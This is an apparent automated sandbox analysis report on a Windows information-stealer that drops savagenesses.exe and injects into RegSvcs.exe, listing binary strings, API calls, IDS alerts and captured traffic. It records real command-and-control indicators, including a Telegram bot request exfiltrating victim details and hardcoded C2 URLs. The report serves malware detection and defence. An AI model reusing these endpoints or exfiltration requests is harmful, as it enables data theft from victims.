Source:	Binary string: wntdll.pdb source: savagenesses.exe, 00000002.00000003.2096617611.0000000003370000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000002.00000003.2102693456.0000000003510000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2239905827.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2242309038.0000000003A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?"oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbtX source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdbL0 source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb) source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdba source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBJ source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0096DBBE
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0093C2A2 FindFirstFileExW,	0_2_0093C2A2
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009768EE FindFirstFileW,FindClose,	0_2_009768EE
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0097698F
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0096D076
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0096D3A9
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00979642
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097979D
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00979B2B
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00975C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00975C97
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00FDDBBE
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FAC2A2 FindFirstFileExW,	2_2_00FAC2A2
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE68EE FindFirstFileW,FindClose,	2_2_00FE68EE
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_00FE698F
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FDD076
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FDD3A9
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FE9642
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FE979D
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00FE9B2B
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00FE5C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0314F8E9h	3_2_0314F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0314FD41h	3_2_0314FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D87A5Dh	3_2_05D87720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D88E28h	3_2_05D88B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D86869h	3_2_05D865C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D818A1h	3_2_05D815F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8C866h	3_2_05D8C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8E856h	3_2_05D8E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D80FF1h	3_2_05D80D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D80741h	3_2_05D80498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8BF46h	3_2_05D8BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8DF36h	3_2_05D8DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esp, ebp	3_2_05D8AC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8DAA6h	3_2_05D8D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8FA96h	3_2_05D8F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8BAB6h	3_2_05D8B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D85A29h	3_2_05D85780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D82A01h	3_2_05D82758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D85179h	3_2_05D84ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8B196h	3_2_05D8AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8D186h	3_2_05D8CEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D82151h	3_2_05D81EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8F176h	3_2_05D8EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D87119h	3_2_05D86E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D848C9h	3_2_05D84620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D84471h	3_2_05D841C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D81449h	3_2_05D811A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8C3D6h	3_2_05D8C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8E3C6h	3_2_05D8E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D80B99h	3_2_05D808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D802E9h	3_2_05D80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D832B1h	3_2_05D83008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D862DBh	3_2_05D86030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D85E81h	3_2_05D85BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D82E59h	3_2_05D82BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8B626h	3_2_05D8B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8D616h	3_2_05D8D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D825A9h	3_2_05D82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8F606h	3_2_05D8F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D855D1h	3_2_05D85328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D87571h	3_2_05D872C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D81CF9h	3_2_05D81A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D84D21h	3_2_05D84A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D86CC1h	3_2_05D86A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8ECE6h	3_2_05D8EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05D8CCF6h	3_2_05D8CA28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49835 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20019635%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49778 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49748 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0097CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0097CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20019635%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 17:55:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000007.00000002.2558253285.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
